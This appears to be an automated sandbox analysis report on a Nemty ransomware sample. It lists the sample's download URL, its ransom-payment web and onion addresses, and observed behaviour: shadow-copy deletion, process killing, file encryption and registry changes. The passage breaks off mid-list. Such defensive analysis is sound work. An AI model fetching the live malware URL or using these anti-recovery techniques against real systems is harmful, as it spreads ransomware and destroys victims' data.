Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10_x64 -
resource
win10v191014 -
submitted
14-02-2020 02:22
Static task
static1
Behavioral task
behavioral1
Sample
http://92.63.197.190/jap.exe
Resource
win10v191014
General
-
Target
http://92.63.197.190/jap.exe
-
Sample
200214-87w9zpv2l2
Malware Config
Extracted
C:\NEMTY_MLK8D17-DECRYPT.txt
nemty
http://nemty.top/public/pay.php
http://zjoxyw5mkacojk5ptn2iprkivg5clow72mjkyk5ttubzxprjjnwapkad.onion/public/pay.php
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
jap.exepid process 4756 jap.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3752 3412 WerFault.exe powershell.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\FriendlyName taskmgr.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid process 5096 iexplore.exe 5096 iexplore.exe 384 IEXPLORE.EXE 384 IEXPLORE.EXE 384 IEXPLORE.EXE 384 IEXPLORE.EXE -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exepid process 3852 vssadmin.exe 4372 vssadmin.exe -
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings cmd.exe -
Kills process with taskkill 14 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1292 taskkill.exe 2900 taskkill.exe 448 taskkill.exe 1156 taskkill.exe 1400 taskkill.exe 3464 taskkill.exe 660 taskkill.exe 1588 taskkill.exe 800 taskkill.exe 836 taskkill.exe 944 taskkill.exe 1348 taskkill.exe 4616 taskkill.exe 1020 taskkill.exe -
Nemty
Ransomware discovered in late 2019 which has been actively developed/updated over time.
-
Processes:
IEXPLORE.EXEiexplore.exeIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30794470" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000295265d942d0de48805329f67cc9983800000000020000000000106600000001000020000000d7c88b58e741d1e449c736ce667c95f7ed236c93511e1f29ce6289d3f629dc0e000000000e80000000020000200000001d8ae9f11f66c5056c9951a7947235506848e2442ab0b56ec5916dbb8216ea6720000000f197656101136b89028a6a31ee589419413e74735863d62714d22fab258531d44000000083f6d6009a5c6ac11df9ac768bbdf6339536b251388615fb241b0506b318d4611c98f6975504460d9991f730b346d818fde53b8393e2797e88a47a713b8bc7ef iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30ed2f17e6e2d501 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "190425451" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "190425451" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30794470" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 500bbb16e6e2d501 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{347DCB3E-4ED9-11EA-BD7F-729D8330D557} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Key created \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000295265d942d0de48805329f67cc9983800000000020000000000106600000001000020000000167a55a9a1403a8c6b5a723521f2c24008cd8a1401bdb6fb0c64e9b220c62b9b000000000e8000000002000020000000f6924af894d1b35a840d49343426719cebcb88a27d033e0bff8a80cb88d2915a2000000045ecc9de6bdfda3134ba1a00581c2a0702959bfb2826ddce24cdb81a15cfc81e4000000015b7e473ae4a1033dc2b722e41b67489f77c94fe94d31883369b882c97c14bad7b6d8fd6e0e1ca3da9c8a4131f946cb2ff24f21b4febddafb8ced1ea01a44764 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 4c6bfe76f785d501 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\PhishingFilter iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\RepId\PublicId = "{C32CDA77-894E-41F6-99DC-FD5B6918BD01}" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "288415526" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\RepId iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main\DownloadWindowPlacement = 2c0000000000000000000000fffffffffffffffffffffffffffffffff30100004d000000730400002d020000 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe -
Suspicious behavior: EnumeratesProcesses 107 IoCs
Processes:
jap.exetaskmgr.exeWerFault.exepid process 4756 jap.exe 4756 jap.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 3752 WerFault.exe 3752 WerFault.exe 3752 WerFault.exe 3752 WerFault.exe 3752 WerFault.exe 3752 WerFault.exe 3752 WerFault.exe 3752 WerFault.exe 3752 WerFault.exe 3752 WerFault.exe 3752 WerFault.exe 3752 WerFault.exe 3752 WerFault.exe 3752 WerFault.exe 3752 WerFault.exe 3752 WerFault.exe 2508 taskmgr.exe 3752 WerFault.exe 3752 WerFault.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe -
Drops file in Program Files directory 58 IoCs
Processes:
jap.exedescription ioc process File renamed C:\Program Files\OutUnpublish.tiff => C:\Program Files\OutUnpublish.tiff.NEMTY_MLK8D17 jap.exe File opened for modification C:\Program Files\SetSubmit.m1v jap.exe File opened for modification C:\Program Files\UseWatch.asx jap.exe File created C:\Program Files (x86)\NEMTY_MLK8D17-DECRYPT.txt jap.exe File opened for modification C:\Program Files\NEMTY_MLK8D17-DECRYPT.txt jap.exe File opened for modification C:\Program Files\AddInitialize.emf jap.exe File renamed C:\Program Files\AddInitialize.emf => C:\Program Files\AddInitialize.emf.NEMTY_MLK8D17 jap.exe File renamed C:\Program Files\DisablePush.M2V => C:\Program Files\DisablePush.M2V.NEMTY_MLK8D17 jap.exe File opened for modification C:\Program Files (x86)\NEMTY_MLK8D17-DECRYPT.txt jap.exe File renamed C:\Program Files\MeasureDisconnect.mp2v => C:\Program Files\MeasureDisconnect.mp2v.NEMTY_MLK8D17 jap.exe File opened for modification C:\Program Files\MoveProtect.3g2 jap.exe File renamed C:\Program Files\PingSubmit.txt => C:\Program Files\PingSubmit.txt.NEMTY_MLK8D17 jap.exe File opened for modification C:\Program Files\TestCheckpoint.vsdm jap.exe File renamed C:\Program Files\UseWatch.asx => C:\Program Files\UseWatch.asx.NEMTY_MLK8D17 jap.exe File created C:\Program Files\NEMTY_MLK8D17-DECRYPT.txt jap.exe File opened for modification C:\Program Files\ApproveRepair.bin jap.exe File opened for modification C:\Program Files\OptimizeWrite.pptx jap.exe File renamed C:\Program Files\OptimizeWrite.pptx => C:\Program Files\OptimizeWrite.pptx.NEMTY_MLK8D17 jap.exe File renamed C:\Program Files\WatchAdd.rtf => C:\Program Files\WatchAdd.rtf.NEMTY_MLK8D17 jap.exe File opened for modification C:\Program Files\DisableDisconnect.asx jap.exe File renamed C:\Program Files\MoveProtect.3g2 => C:\Program Files\MoveProtect.3g2.NEMTY_MLK8D17 jap.exe File opened for modification C:\Program Files\PingSubmit.txt jap.exe File opened for modification C:\Program Files\ReadRedo.reg jap.exe File opened for modification C:\Program Files\MergeWatch.pps jap.exe File renamed C:\Program Files\PublishComplete.ppsx => C:\Program Files\PublishComplete.ppsx.NEMTY_MLK8D17 jap.exe File opened for modification C:\Program Files\MeasureDisconnect.mp2v jap.exe File opened for modification C:\Program Files\SearchConnect.pps jap.exe File renamed C:\Program Files\SearchConnect.pps => C:\Program Files\SearchConnect.pps.NEMTY_MLK8D17 jap.exe File renamed C:\Program Files\TestUnpublish.ico => C:\Program Files\TestUnpublish.ico.NEMTY_MLK8D17 jap.exe File renamed C:\Program Files\AddAssert.emz => C:\Program Files\AddAssert.emz.NEMTY_MLK8D17 jap.exe File renamed C:\Program Files\ImportPop.mpg => C:\Program Files\ImportPop.mpg.NEMTY_MLK8D17 jap.exe File opened for modification C:\Program Files\UnprotectRevoke.mpa jap.exe File opened for modification C:\Program Files\WatchAdd.rtf jap.exe File renamed C:\Program Files\DisableDisconnect.asx => C:\Program Files\DisableDisconnect.asx.NEMTY_MLK8D17 jap.exe File renamed C:\Program Files\DismountGet.css => C:\Program Files\DismountGet.css.NEMTY_MLK8D17 jap.exe File opened for modification C:\Program Files\SuspendTrace.xlsx jap.exe File renamed C:\Program Files\TestCheckpoint.vsdm => C:\Program Files\TestCheckpoint.vsdm.NEMTY_MLK8D17 jap.exe File opened for modification C:\Program Files\ImportPop.mpg jap.exe File opened for modification C:\Program Files\RepairHide.zip jap.exe File renamed C:\Program Files\SuspendTrace.xlsx => C:\Program Files\SuspendTrace.xlsx.NEMTY_MLK8D17 jap.exe File renamed C:\Program Files\ConfirmMerge.asx => C:\Program Files\ConfirmMerge.asx.NEMTY_MLK8D17 jap.exe File opened for modification C:\Program Files\DisablePush.M2V jap.exe File renamed C:\Program Files\MergeWatch.pps => C:\Program Files\MergeWatch.pps.NEMTY_MLK8D17 jap.exe File renamed C:\Program Files\RepairHide.zip => C:\Program Files\RepairHide.zip.NEMTY_MLK8D17 jap.exe File renamed C:\Program Files\UnprotectRevoke.mpa => C:\Program Files\UnprotectRevoke.mpa.NEMTY_MLK8D17 jap.exe File renamed C:\Program Files\GroupMove.vbe => C:\Program Files\GroupMove.vbe.NEMTY_MLK8D17 jap.exe File opened for modification C:\Program Files\PublishComplete.ppsx jap.exe File renamed C:\Program Files\ReadRedo.reg => C:\Program Files\ReadRedo.reg.NEMTY_MLK8D17 jap.exe File renamed C:\Program Files\SetSubmit.m1v => C:\Program Files\SetSubmit.m1v.NEMTY_MLK8D17 jap.exe File opened for modification C:\Program Files\ConfirmHide.xml jap.exe File opened for modification C:\Program Files\DismountGet.css jap.exe File opened for modification C:\Program Files\GroupMove.vbe jap.exe File opened for modification C:\Program Files\OutUnpublish.tiff jap.exe File renamed C:\Program Files\ApproveRepair.bin => C:\Program Files\ApproveRepair.bin.NEMTY_MLK8D17 jap.exe File opened for modification C:\Program Files\ConfirmMerge.asx jap.exe File opened for modification C:\Program Files\TestUnpublish.ico jap.exe File opened for modification C:\Program Files\AddAssert.emz jap.exe File renamed C:\Program Files\ConfirmHide.xml => C:\Program Files\ConfirmHide.xml.NEMTY_MLK8D17 jap.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Processes:
jap.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\75E0ABB6138512271C04F85FDDDE38E4B7242EFE jap.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\75E0ABB6138512271C04F85FDDDE38E4B7242EFE\Blob = 5c000000010000000400000000080000090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020b000000010000005c00000047006f006f0067006c00650020005400720075007300740020005300650072007600690063006500730020002d00200047006c006f00620061006c005300690067006e00200052006f006f0074002000430041002d005200320000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0620000000100000020000000ca42dd41745fd0b81eb902362cf9d8bf719da1bd1b1efc946f5b4c99f42c1b9e1400000001000000140000009be20757671c1ec06a06de59b49a2ddfdc19862e1d000000010000001000000073621e116224668780b2d2bee454e52e03000000010000001400000075e0abb6138512271c04f85fddde38e4b7242efe2000000001000000be030000308203ba308202a2a003020102020b0400000000010f8626e60d300d06092a864886f70d0101050500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523231133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3036313231353038303030305a170d3231313231353038303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523231133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a6cf240ebe2e6f28994542c4ab3e21549b0bd37f8470fa12b3cbbf875fc67f86d3b2305cd6fdadf17bdce5f86096099210f5d053defb7b7e7388ac52887b4aa6ca49a65ea8a78c5a11bc7a82ebbe8ce9b3ac962507974a992a072fb41e77bf8a0fb5027c1b96b8c5b93a2cbcd612b9eb597de2d006865f5e496ab5395e8834ecbc780c0898846ca8cd4bb4a07d0c794df0b82dcb21cad56c5b7de1a02984a1f9d39449cb24629120bcdd0bd5d9ccf9ea270a2b7391c69d1bacc8cbe8e0a0f42f908b4dfbb0361bf6197a85e06df26113885c9fe0930a51978a5aceafabd5f7aa09aa60bddcd95fdf72a960135e0001c94afa3fa4ea070321028e82ca03c29b8f0203010001a3819c308199300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604149be20757671c1ec06a06de59b49a2ddfdc19862e30360603551d1f042f302d302ba029a0278625687474703a2f2f63726c2e676c6f62616c7369676e2e6e65742f726f6f742d72322e63726c301f0603551d230418301680149be20757671c1ec06a06de59b49a2ddfdc19862e300d06092a864886f70d01010505000382010100998153871c68978691ece04ab8440bab81ac274fd6c1b81c4378b30c9afcea2c3c6e611b4d4b29f59f051d26c1b8e983006245b6a90893b9a9334b189ac2f887884edbdd71341ac154da463fe0d32aab6d5422f53a62cd206fba2989d7dd91eed35ca23ea15b41f5dfe564432de9d539abd2a2dfb78bd0c080191c45c02d8ce8f82da4745649c505b54f15de6e44783987a87ebbf3791891bbf46f9dc1f08c358c5d01fbc36db9ef446d7946317e0afea982c1ffefab6e20c450c95f9d4d9b178c0ce501c9a0416a7353faa550b46e250ffb4c18f4fd52d98e69b1e8110fde88d8fb1d49f7aade95cf2078c26012db25408c6afc7e4238406412f79e81e1932e jap.exe -
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IEXPLORE.EXE Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IEXPLORE.EXE -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
WerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Suspicious use of WriteProcessMemory 180 IoCs
Processes:
iexplore.exejap.execmd.execmd.execmd.execmd.execmd.exenet.exedescription pid process target process PID 5096 wrote to memory of 384 5096 iexplore.exe IEXPLORE.EXE PID 5096 wrote to memory of 384 5096 iexplore.exe IEXPLORE.EXE PID 5096 wrote to memory of 384 5096 iexplore.exe IEXPLORE.EXE PID 5096 wrote to memory of 3704 5096 iexplore.exe IEXPLORE.EXE PID 5096 wrote to memory of 3704 5096 iexplore.exe IEXPLORE.EXE PID 5096 wrote to memory of 3704 5096 iexplore.exe IEXPLORE.EXE PID 5096 wrote to memory of 4756 5096 iexplore.exe jap.exe PID 5096 wrote to memory of 4756 5096 iexplore.exe jap.exe PID 5096 wrote to memory of 4756 5096 iexplore.exe jap.exe PID 4756 wrote to memory of 4536 4756 jap.exe cmd.exe PID 4756 wrote to memory of 4536 4756 jap.exe cmd.exe PID 4756 wrote to memory of 4536 4756 jap.exe cmd.exe PID 4756 wrote to memory of 4508 4756 jap.exe cmd.exe PID 4756 wrote to memory of 4508 4756 jap.exe cmd.exe PID 4756 wrote to memory of 4508 4756 jap.exe cmd.exe PID 4508 wrote to memory of 4372 4508 cmd.exe vssadmin.exe PID 4508 wrote to memory of 4372 4508 cmd.exe vssadmin.exe PID 4508 wrote to memory of 4372 4508 cmd.exe vssadmin.exe PID 4536 wrote to memory of 3852 4536 cmd.exe vssadmin.exe PID 4536 wrote to memory of 3852 4536 cmd.exe vssadmin.exe PID 4536 wrote to memory of 3852 4536 cmd.exe vssadmin.exe PID 4756 wrote to memory of 4340 4756 jap.exe cmd.exe PID 4756 wrote to memory of 4340 4756 jap.exe cmd.exe PID 4756 wrote to memory of 4340 4756 jap.exe cmd.exe PID 4756 wrote to memory of 4888 4756 jap.exe cmd.exe PID 4756 wrote to memory of 4888 4756 jap.exe cmd.exe PID 4756 wrote to memory of 4888 4756 jap.exe cmd.exe PID 4756 wrote to memory of 524 4756 jap.exe cmd.exe PID 4756 wrote to memory of 524 4756 jap.exe cmd.exe PID 4756 wrote to memory of 524 4756 jap.exe cmd.exe PID 4756 wrote to memory of 3412 4756 jap.exe powershell.exe PID 4756 wrote to memory of 3412 4756 jap.exe powershell.exe PID 4756 wrote to memory of 3412 4756 jap.exe powershell.exe PID 4340 wrote to memory of 800 4340 cmd.exe taskkill.exe PID 4340 wrote to memory of 800 4340 cmd.exe taskkill.exe PID 4340 wrote to memory of 800 4340 cmd.exe taskkill.exe PID 4888 wrote to memory of 4976 4888 cmd.exe net.exe PID 4888 wrote to memory of 4976 4888 cmd.exe net.exe PID 4888 wrote to memory of 4976 4888 cmd.exe net.exe PID 524 wrote to memory of 4752 524 cmd.exe WMIC.exe PID 524 wrote to memory of 4752 524 cmd.exe WMIC.exe PID 524 wrote to memory of 4752 524 cmd.exe WMIC.exe PID 4976 wrote to memory of 3596 4976 net.exe net1.exe PID 4976 wrote to memory of 3596 4976 net.exe net1.exe PID 4976 wrote to memory of 3596 4976 net.exe net1.exe PID 4340 wrote to memory of 3464 4340 cmd.exe taskkill.exe PID 4340 wrote to memory of 3464 4340 cmd.exe taskkill.exe PID 4340 wrote to memory of 3464 4340 cmd.exe taskkill.exe PID 4340 wrote to memory of 1292 4340 cmd.exe taskkill.exe PID 4340 wrote to memory of 1292 4340 cmd.exe taskkill.exe PID 4340 wrote to memory of 1292 4340 cmd.exe taskkill.exe PID 4340 wrote to memory of 4616 4340 cmd.exe taskkill.exe PID 4340 wrote to memory of 4616 4340 cmd.exe taskkill.exe PID 4340 wrote to memory of 4616 4340 cmd.exe taskkill.exe PID 4340 wrote to memory of 2900 4340 cmd.exe taskkill.exe PID 4340 wrote to memory of 2900 4340 cmd.exe taskkill.exe PID 4340 wrote to memory of 2900 4340 cmd.exe taskkill.exe PID 4340 wrote to memory of 448 4340 cmd.exe taskkill.exe PID 4340 wrote to memory of 448 4340 cmd.exe taskkill.exe PID 4340 wrote to memory of 448 4340 cmd.exe taskkill.exe PID 4340 wrote to memory of 660 4340 cmd.exe taskkill.exe PID 4340 wrote to memory of 660 4340 cmd.exe taskkill.exe PID 4340 wrote to memory of 660 4340 cmd.exe taskkill.exe PID 4340 wrote to memory of 836 4340 cmd.exe taskkill.exe -
Suspicious use of FindShellTrayWindow 102 IoCs
Processes:
iexplore.exetaskmgr.exeWerFault.exepid process 5096 iexplore.exe 5096 iexplore.exe 5096 iexplore.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 3752 WerFault.exe 2508 taskmgr.exe 5096 iexplore.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe 2508 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 65 IoCs
Processes:
vssvc.exeWMIC.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeWerFault.exetaskmgr.exedescription pid process Token: SeBackupPrivilege 2976 vssvc.exe Token: SeRestorePrivilege 2976 vssvc.exe Token: SeAuditPrivilege 2976 vssvc.exe Token: SeIncreaseQuotaPrivilege 4752 WMIC.exe Token: SeSecurityPrivilege 4752 WMIC.exe Token: SeTakeOwnershipPrivilege 4752 WMIC.exe Token: SeLoadDriverPrivilege 4752 WMIC.exe Token: SeSystemProfilePrivilege 4752 WMIC.exe Token: SeSystemtimePrivilege 4752 WMIC.exe Token: SeProfSingleProcessPrivilege 4752 WMIC.exe Token: SeIncBasePriorityPrivilege 4752 WMIC.exe Token: SeCreatePagefilePrivilege 4752 WMIC.exe Token: SeBackupPrivilege 4752 WMIC.exe Token: SeRestorePrivilege 4752 WMIC.exe Token: SeShutdownPrivilege 4752 WMIC.exe Token: SeDebugPrivilege 4752 WMIC.exe Token: SeSystemEnvironmentPrivilege 4752 WMIC.exe Token: SeRemoteShutdownPrivilege 4752 WMIC.exe Token: SeUndockPrivilege 4752 WMIC.exe Token: SeManageVolumePrivilege 4752 WMIC.exe Token: 33 4752 WMIC.exe Token: 34 4752 WMIC.exe Token: 35 4752 WMIC.exe Token: 36 4752 WMIC.exe Token: SeDebugPrivilege 800 taskkill.exe Token: 